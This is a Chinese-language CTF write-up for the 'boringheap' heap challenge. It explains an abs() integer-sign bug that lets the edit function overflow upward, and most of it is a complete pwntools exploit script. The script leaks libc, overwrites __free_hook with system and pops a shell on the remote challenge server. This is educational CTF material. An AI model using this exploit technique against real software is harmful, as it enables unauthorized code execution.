shanghai2019_boringheap

首先，检查一下程序的保护机制

然后，我们用IDA分析一下，edit函数里使用了abs函数，abs函数接收4字节有符号int数，当传入0x80000000时，其返回结果仍然是0x80000000，由于4字节int正数将无法表示这么大，因此，其值是一个负数，由此，可以造成堆溢出。

然后就可以利用了

#coding:utf8
from pwn import *

#sh = process('./shanghai2019_boringheap')
sh = remote('node3.buuoj.cn',25580)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']

def add(type,content):
   sh.sendlineafter('5.Exit','1')
   sh.sendlineafter('3.Large',str(type))
   sh.sendlineafter('Input Content:',content)

def edit(index,offset,content):
   sh.sendlineafter('5.Exit','2')
   sh.sendlineafter('Which one do you want to update?',str(index))
   sh.sendlineafter('Where you want to update?',str(offset))
   sh.sendlineafter('Input Content:',content)


def delete(index):
   sh.sendlineafter('5.Exit','3')
   sh.sendlineafter('Which one do you want to delete?',str(index))

def show(index):
   sh.sendlineafter('5.Exit','4')
   sh.sendlineafter('Which one do you want to view?',str(index))

for i in range(20):
   add(2,'a')
#向上溢出，修改到自身的头，伪造一个large bin
payload = '\x00'*0x18 + p64(0x441)
edit(0,0x80000000,payload)
delete(0)
add(2,'a') #20
show(1)
sh.recvuntil('\n')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
add(2,'a') #21
delete(1)
edit(21,0,p64(free_hook_addr))
add(2,'/bin/sh\x00') #22
add(2,p64(system_addr))
#getshell
delete(22)

sh.interactive()